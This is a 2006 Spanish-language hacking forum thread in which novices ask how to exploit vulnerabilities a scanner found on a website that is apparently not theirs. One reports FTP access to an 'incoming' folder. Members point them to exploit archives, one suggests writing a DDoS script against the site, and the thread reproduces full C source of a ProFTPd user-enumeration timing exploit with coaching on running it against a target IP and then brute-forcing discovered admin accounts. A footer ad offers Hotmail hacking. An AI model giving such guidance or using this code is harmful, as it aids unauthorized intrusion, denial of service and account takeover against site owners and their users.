hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
15 de Octubre de 2008, 08:54:02
Noticias: Nomina a tus preferidos para los pOrtal Hacker Awards 2008
Para ver este enlace Registrate o Inicia Sesion
aqui

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderador: vengador de las sombras)
| | |-+  Vulnerabilidades sin fin ¿pero como saber que usar pa explotarlas?
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 2 [Todos] Ir Abajo Imprimir
Autor Tema: Vulnerabilidades sin fin ¿pero como saber que usar pa explotarlas?  (Leído 1832 veces)
master_0cx
Recien llegado
*
Desconectado Desconectado

Mensajes: 4


Ver Perfil
« : 15 de Julio de 2006, 02:02:09 »

Bueno amigos he scaneado web...bla bla bla....tiene mas bugs que la muralla china ...pero, como explotarlos?, les muestro:


Apache Mod_SSL Apache-SSL Buffer Overflow Vulnerability   port 80

Apache Mod_SSL Apache-SSL Buffer Overflow Vulnerability   port 443

Exim Illegal IPv6 Address Buffer Overflow Vulnerability          port 25

Exim IP Address Command Line Argument Local Buffer Overflow   port25

OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability  port 22

OpenSSL ASN.1 Large Recursion Remote Denial Of Service Vulnerability port 443
______________ ______________ ______________ ______________ ________

hay inyecciones especificas? , algun tipo de xploit?, gracias de antemano
En línea
askatasun
Administrador
*****
Desconectado Desconectado

Mensajes: 883



Ver Perfil
« Respuesta #1 : 15 de Julio de 2006, 02:17:10 »

te refieres a exploits, pues si, siempre acostumbran a haber exploits para cada clase de bugs.
mira en security focus

que escaner usaste?
En línea

no respondo preguntas por mp, para dudas el foro
master_0cx
Recien llegado
*
Desconectado Desconectado

Mensajes: 4


Ver Perfil
« Respuesta #2 : 15 de Julio de 2006, 02:34:33 »

use shadow security scanner

tiene como 30 bugs la web , pero creo aun me falta como enviar esos xploits xd, ando en la web que me dices investigando.
En línea
askatasun
Administrador
*****
Desconectado Desconectado

Mensajes: 883



Ver Perfil
« Respuesta #3 : 15 de Julio de 2006, 04:49:17 »

entonces no hay problema, si te seleccionas una de esas vulnerabilidad es, una vez hecho el escaner

veras que en dicho escaner abajo del todo hay un link llamado bugtrad id (o algo asi) si haces click al numero que hay al lado se te abrira una pagina de internet que te llevara donde esta el codigo fuente del exploit,
compilado dudo que este.

En línea

no respondo preguntas por mp, para dudas el foro
master_0cx
Recien llegado
*
Desconectado Desconectado

Mensajes: 4


Ver Perfil
« Respuesta #4 : 15 de Julio de 2006, 09:42:07 »

BUENO LOGRO ENTRAR POR FTP HASTA UNA CARPETA LLAMADA INCOMING,  se podra hacer algo con eso??? Angry
En línea
vart001
Administrador
*****
Desconectado Desconectado

Mensajes: 1,413


El Mero, mero!


Ver Perfil WWW
« Respuesta #5 : 04 de Agosto de 2006, 04:24:32 »

Citar
Apache Mod_SSL Apache-SSL Buffer Overflow Vulnerability   port 80
es al puerto 80, osea al http, hay que buscar y leer de que trata el bug y luego bien podrias crear un script de esos ddos
osea peticiones masivas
En línea

root from cph


Para ver este enlace Registrate o Inicia Sesion
Hackear hotmail aqui

Phantom_Lord
NZ2
**
Desconectado Desconectado

Mensajes: 112



Ver Perfil WWW
« Respuesta #6 : 08 de Agosto de 2006, 07:54:44 »

De que se trata el exploit? ahi lo dice hace un desbordamiento de pila en el modulo Mod_SSL Apache-SSL por supuesto de apache.

tendrias que ver que privilegios podes ganar con ese exploit.

aver te explico de que se trata mas o menos lo que te dice asi por arriba nomas ya que no veo los exploits.

Apache Mod_SSL Apache-SSL Buffer Overflow Vulnerability   port 80 > ya lo dije arriba en el puerto 80

Apache Mod_SSL Apache-SSL Buffer Overflow Vulnerability   port 443 > el mismo pero en el 443

Exim Illegal IPv6 Address Buffer Overflow Vulnerability          port 25> overflow en una direccion ilegal al  protocolo IPv6.

Exim IP Address Command Line Argument Local Buffer Overflow   port25> mas o menos todos los mismos (puerto 25 SMTP)

OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability  port 22> denegacion de servicio en el slogin del secure shell (22)

OpenSSL ASN.1 Large Recursion Remote Denial Of Service Vulnerability port 443
RDOS en el puerto 443.

Si no sabes de que hable mas o menos por arriba . Lee sobre todo esos temas.

Salu2
En línea

Click En la imagen Para ingresar A Mi Web - Sumate a la comunidad Fantasma

Para ver este enlace Registrate o Inicia Sesion
OzX
Visitante
« Respuesta #7 : 03 de ſeptiembre de 2006, 06:19:39 »

podrias buscar en

Para ver este enlace Registrate o Inicia Sesion
www.milw0rm.co m


Para ver este enlace Registrate o Inicia Sesion
http://www.securityfocus.com/vulnerabilities


pero por lo q buske no ahy exploit... osea no todavia...
podrias probar con otros scanner...
Cheesy
saludos
adios¡
En línea
catter1
Recien llegado
*
Desconectado Desconectado

Mensajes: 10


Ver Perfil
« Respuesta #8 : 14 de Octubre de 2006, 04:54:42 »

Hola soy nuevo llevo estudiando todas estas cosas varios dias y joder es lio flipante, weno yo escaneo una pag m salen los fallos, despues m voy a la ID del exploit m sale una pag,despues si ay suerte m vajo el exploit k son unos codigos eso lo meto en un txt pero ya ay m pierdo e estado intentando leer eso de compilar extensiones .pl pero plis no m entero de nada solo kn k m digais k tengo k acer aora os lo agradeceria muxo.Asias

SLU2
« Última modificación: 14 de Octubre de 2006, 04:57:03 por catter1 » En línea
OzX
Visitante
« Respuesta #9 : 14 de Octubre de 2006, 09:42:57 »

todo depende de cada tipo de exploit
te recomiendoi que leas que es un EXPLOIT, los distintos tipos etc.
cada exploit en diferente de otro. alguinos son para bufferoverflow, otros para dos, otros rfi, otros sql etc, ahy una infinidad de exploit.

una ves ejecutado en el mismo exploit te sale como ejecutarlo y si sabes a k clase correspondes, dos, rfi, o cualquier otro sabras que hacer.
En línea
catter1
Recien llegado
*
Desconectado Desconectado

Mensajes: 10


Ver Perfil
« Respuesta #10 : 14 de Octubre de 2006, 11:17:49 »

Ok m e leido todos los manuales de como compilar en perl C tengo el exploit de un fallo de la pag y compilado aora komo puedo lanzarlo a la web?
En línea
OzX
Visitante
« Respuesta #11 : 14 de Octubre de 2006, 11:37:58 »

en el mismo exploiot dice abveces te pide el pueto
o la Ip

exploit.pl o exploiot .c ip puerto
etc o distintos datos
si en de foros te pide el directorio etc

lee mas sobre lso distintos tipos men, tienes que leer para poder entenderlo no es k le tires una piedra al sistema y se lanzara, solo se ejecuta para establcer una conexion con el otro pc, para poder obtener privilegios.. o cualquier otra cosa

lee lee lee leee y ve bien el code dle exploit.
En línea
catter1
Recien llegado
*
Desconectado Desconectado

Mensajes: 10


Ver Perfil
« Respuesta #12 : 14 de Octubre de 2006, 12:24:11 »

Si tio eso ya lo se mira t ensenio k exploit es:
// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic //
Para ver este enlace Registrate o Inicia Sesion

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
  int sock,n,y;
  long dist,stat=0;
  struct sockaddr_in sin;
  char buf[1024], buf2[1024];
  struct timeval tv, tv2;
  struct timezone tz, tz2;

  printf ("Proftpd remote users discovery exploit\n"
          " Coded by Leon / LSS Security\n"
          ">-------------------------------------<\n");

  if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }
 
  sock = socket (AF_INET, SOCK_STREAM, 0);
  sin.sin_family = AF_INET;
  sin.sin_port = htons (PORT);
  sin.sin_addr.s _addr = inet_addr (argv[1]);
  bzero (sin.sin_zero,8);

  connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

  printf ("Login time: ");
  n = read (sock,buf2, sizeof(buf2));
  for (y=0;y<PROBE;y++) {
     gettimeofday (&tv,&tz);
     snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]);
     write (sock, buf, strlen(buf));
     n = read (sock,buf2, sizeof(buf2));
     gettimeofday (&tv2,&tz2);
     dist =tv2.tv_usec - tv.tv_usec;
     stat += dist;
     printf (" %d |",dist);
  }
  printf ("\nAvrg: %d\n",(stat/PROBE));
  close (sock);
}

Esto es la copia del exploit sin compilar, tengo otro ya compilado.Ento nces... aora k tengo k acer?? no se donde poner la ip.(si sirve de algo tengo el SSS de escaner)

Asias de antemano aora a seguir estudiando jajaja(por lo menos ya se compilar y cosas de los lenguages asias a tus manuales
En línea
OzX
Visitante
« Respuesta #13 : 14 de Octubre de 2006, 06:32:15 »

jejeje... mira anda a la pagina de security focius en donde lo encontre y ve la pagina del autor ahy encontraras mas info, pero este exploit solo hace ver un usuario tiene privilegios o no.
nada mas es un exploit medio raro, pero sirve para fuerza bruta o que se yo, pero te recomiendo q leas como funciona en la pagina del autor, sale en security focus. revisa bien..

saludos

pd: el exploit no aprovechas nada, ni md5 , hash etc, solo ver si un user es "especial" o no. nada mas
En línea
catter1
Recien llegado
*
Desconectado Desconectado

Mensajes: 10


Ver Perfil
« Respuesta #14 : 15 de Octubre de 2006, 06:26:05 »

Si tio eske es mi primer exploit y kiero provar luego ya...jejejeje. Mira:http://security.lss.hr/en/index.php?page=details&ID=LSS-2004-10-02

Lo e traducido todo pero sigo sin saver komo mandarseloa  la victima, eske no m empano de nada en la seccion vulneravility puede estar??eske no se asias de antemano salu2 jaja
En línea
OzX
Visitante
« Respuesta #15 : 15 de Octubre de 2006, 01:02:17 »

traducelo bien hombre si ahy sale como ejecutarlo en la pagina del autor

xxx.xxx.xxx.xx x NOMBREUSER

y te saldran los intevalos, ve el significao en la web del user quien creo el exploit,
En línea
catter1
Recien llegado
*
Desconectado Desconectado

Mensajes: 10


Ver Perfil
« Respuesta #16 : 16 de Octubre de 2006, 06:53:10 »

seeeee ya estaaaaaaaa asias!!!!!!!!
En línea
OzX
Visitante
« Respuesta #17 : 16 de Octubre de 2006, 10:26:53 »

lon que puedes obtener con esa vulne es indentificar algun admin u user y atakar por fuerza bruta.. es lo unico logico que encuentro..
En línea
Páginas: 1 2 [Todos] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online